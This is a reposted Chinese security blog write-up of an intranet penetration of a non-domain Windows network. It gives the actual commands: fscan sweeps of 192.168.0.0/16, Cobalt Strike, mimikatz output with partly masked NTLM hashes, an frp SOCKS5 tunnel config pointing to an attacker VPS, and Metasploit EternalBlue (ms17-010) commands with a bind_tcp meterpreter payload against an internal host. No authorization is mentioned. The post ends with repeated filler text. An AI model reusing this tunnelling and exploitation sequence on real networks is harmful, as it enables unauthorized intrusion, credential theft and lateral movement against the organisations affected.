记一次内网非域渗透

admin 2024年1月11日10:21:04评论11 views字数 1234阅读4分6秒阅读模式
getshell
入口:CVE-2023-XXXX
内网信息收集
这里内网没有域,win8.1
记一次内网非域渗透
ipconfig /all
记一次内网非域渗透
systeminfo
以下就放出部分信息图    
记一次内网非域渗透
记一次内网非域渗透
fscan扫描结果,以下就放出部分关键信息图
fscan64.exe -h 192.168.0.0/16 -o ip.txt
记一次内网非域渗透    
记一次内网非域渗透
上线cs
记一次内网非域渗透
用CS就扫到了C段其他机器
记一次内网非域渗透
记一次内网非域渗透
mimikatz没有抓到明文
WIN-NEKUTDTFHH5sopharus 31d6cfe0d16ae931b73c59xxxxxxx                  
WIN-NEKUTDTFHH5sysaidinternal 5f8be701c55327d21d25a9
xxxxxxx
frp代理进内网
frpc.ini
[common]                  
server_addr = vps                  
server_port = 7011                  
[socks5]                  
type = tcp                  
remote_port = 62493                  
plugin = socks5
       
frps.ini
[common]                  
bind_port = 7012
这里随便看两个个web页面,感觉好多都差不多一样
http://192.168.153.59/
记一次内网非域渗透
http://192.168.64.253/    
记一次内网非域渗透
不出网利用ms17-010
这里使用ms17-010横向,需要转msf了,因为内网其他机器都不出网,cs打这个漏洞用不了正向shell
记一次内网非域渗透    
在msf设置frp的全局代理
setg Proxies socks5:frp的IP及端口
                 
setg ReverseAllowProxy true
使用ms17-010模块直接一把梭
use exploit/windows/smb/ms17_010_eternalblue
                 
set payload windows/x64/meterpreter/bind_tcp
                 
set rhost 192.168.153.73
                 
exploit
记一次内网非域渗透    
 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数 凑字数

原文始发于微信公众号(web安全初心实验室):记一次内网非域渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月11日10:21:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网非域渗透https://cn-sec.com/archives/2383144.html

发表评论

匿名网友 填写信息